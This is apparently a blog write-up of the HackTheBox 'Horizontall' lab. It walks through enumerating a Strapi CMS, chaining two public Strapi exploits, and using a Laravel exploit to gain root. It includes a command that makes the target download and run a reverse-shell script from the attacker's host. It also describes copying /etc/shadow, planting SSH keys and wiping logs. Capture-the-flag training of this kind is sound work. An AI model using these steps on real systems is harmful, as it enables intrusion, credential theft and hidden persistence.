HackTheBox: Horizontall Writeup

IP = 10.10.11.105
Difficulty: Easy
Machine OS: Linux
Learning Platform: hackthebox.eu
Finished on: Arch Linux

Reconnaissance

Scoping and Preparation

I used my tool CTFRecon to automate directory creation, network scanning, web directory brute-forcing and adding entry to /etc/hosts file.

To use CTFRecon:

1. git clone https://www.github.com/hambyhacks/CTFrecon

2. cd CTFRecon

3. chmod +x ctfrecon.sh && cp ctfrecon.sh ../

4. sudo ./ctfrecon.sh [IP] [DIRECTORY NAME] [PLATFORM] [WORDLIST]

Preliminary Enumeration via nmap

Table 1.1: nmap Results

Machine OS: Based on OpenSSH version, machine is Ubuntu Bionic.

Enumeration

Manual Web Enumeration

Looking at the webpage at port 80, we are greeted by this webpage below.

We can also look through the source code of the page.

We can check for .js files in the source code to see if there is something interesting in it.

Checking the app.c68eb462.js file, we can see that is obfuscated, meaning the JavaScript file is written in a way that is not human readable.

We can use Beautifier.io to make it more readable. Copy the whole content of app.c68eb462.js and paste it in the space provided in the web app.

We can also found it by manual checking the .js file.

Also make sure to add api-prod.horizontall.htb to /etc/hosts file.

Note: This is why manual enumeration is important!

We can now look at the subdomain of the webpage: api-prod.horizontall.htb.

Looking at the source code of api-prod.horizontall.htb, we found out that it is does not help us much.

We can also look at the web technologies used in api-prod.horizontall.htb using Wappalyzer.

We can see that the web server is using Strapi CMS.

Let's enumerate more using automated tools.

Web Enumeration using GoBuster

We need to find a way to enumerate the webpage further, this time we use automated tools to help us find endpoints in api-prod.horizontall.htb.

Using GoBuster, we found some interesting directories.

As we can see above, there is an admin directory! Let's try to navigate to that.

Nice! A login page. We can try to do some basic SQL injection. I have only done manual testing before I tried to search strapi on Google.

Tip: When in doubt, search it in Google.

Possible Exploits

We recently found out that api-prod.horizontall.htb is running strapi CMS(Content Management System).

Google search: strapi CMS exploit

First search result gives us an unauthenticated RCE on strapi CMS! But we need to know what version the CMS is running.

I got stucked here for a bit, but I tried to read the documentation.

I decided to read the python exploit script from exploit-db and searched it on Google. It is classified as CVE-2019-18818, CVE-2019-19609.

CVE-2019-18818 is an unauthenticated RCE (Remote Code Execution) which allows an attacker to reset an admin's password without providing valid password reset token.

CVE-2019-19609 is an authenticated RCE which allows attackers inject arbitrary shell commands because of improper input sanitization.

Reading the exploit script in exploit-db, the script is sending GET request to /admin/init. We can try to see if it is present in the web server.

Cool! We confirmed that the version is indeed 3.0.0-beta.17.4.

Exploitation

Steps to reproduce:

  1. Go to Exploit-db and copy this script.
  2. Open a text editor and save it as CVE-2019-18818.py (or any filename you like).
  3. On your terminal, type:
  • python3 CVE-2019-18818.py api-prod.horizontall.htb

4. Copy the JWT token produced by the script and save it for later. Output should be like this:

5. We can now login on the web server.

6. Looking back at our status, we are now authenticated as admin. We can use the exploit script CVE-2019-19609 to get a shell on machine.

7. On your terminal,type:

  • python3 strapi17-4_RCE.py http://api-prod.horizontall.htb {JWT_TOKEN_HERE} 'wget http://{YOUR_IP}:{PORT}/{REVERSE_SHELL_FILE};chmod +x s.sh;bash s.sh' {YOUR_IP}

8. Make sure http server and netcat listener are on before you hit enter.

9. Reverse shell should be downloaded and also the reverse shell should pop up.

Privilege Escalation / Post-Exploitation

Internal Enumeration

SSH port is open so I assume there is ssh-keygen binary in the machine.

To make sure we have access on the box even it errors out, we need to setup our ssh keys on strapi user.

Copy your SSH public key and add it on the machine's /opt/strapi/.ssh/authorized_keys.

We found a file named database.json on /myapi/config/environments/development/

We don't know what is the password of our current user strapi. We must enumerate further more.

Table 1.2: Checklist for Linux Internal Enumeration

Notes: For more information about the commands look here

Tip: When nothing else makes sense, try to use LinPEAS (winPEAS for windows machines.).

Vertical Privilege Escalation

I got stucked here for a bit because I got on the rabbit hole finding the password for strapi user.

I also read some comments on the forum but I got stucked again. I read the comments again and again and I got what we need to do.

We found out that Laravel version is vulnerable to RCE by searching the version number in Google.

First, we need to login again to the ssh server with port forwarding so we can see the send request through port 8000. To do this:

Download this exploit PoC to root the machine.

Navigate to /root/ directory and get your root.txt flag!

STATUS: ROOTED

The next two steps are not necessary for completion of the machine but it completes the 5 Phases of Penetration Testing.

Post Exploitation / Maintaining Access

Copied the /etc/shadow file for user identification and their passwords.

Added SSH key to as root user.

Clearing Tracks

Removed all logs and footprints to to prevent risk of exposure of breach to security administrator.

Status: Finished

Feel free to reach out and if there is something wrong about the above post. Feedbacks are also appreciated :D

Donation Box

Not required but appreciated :D

Socials

Originally published at https://hambyhacks.hashnode.dev.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store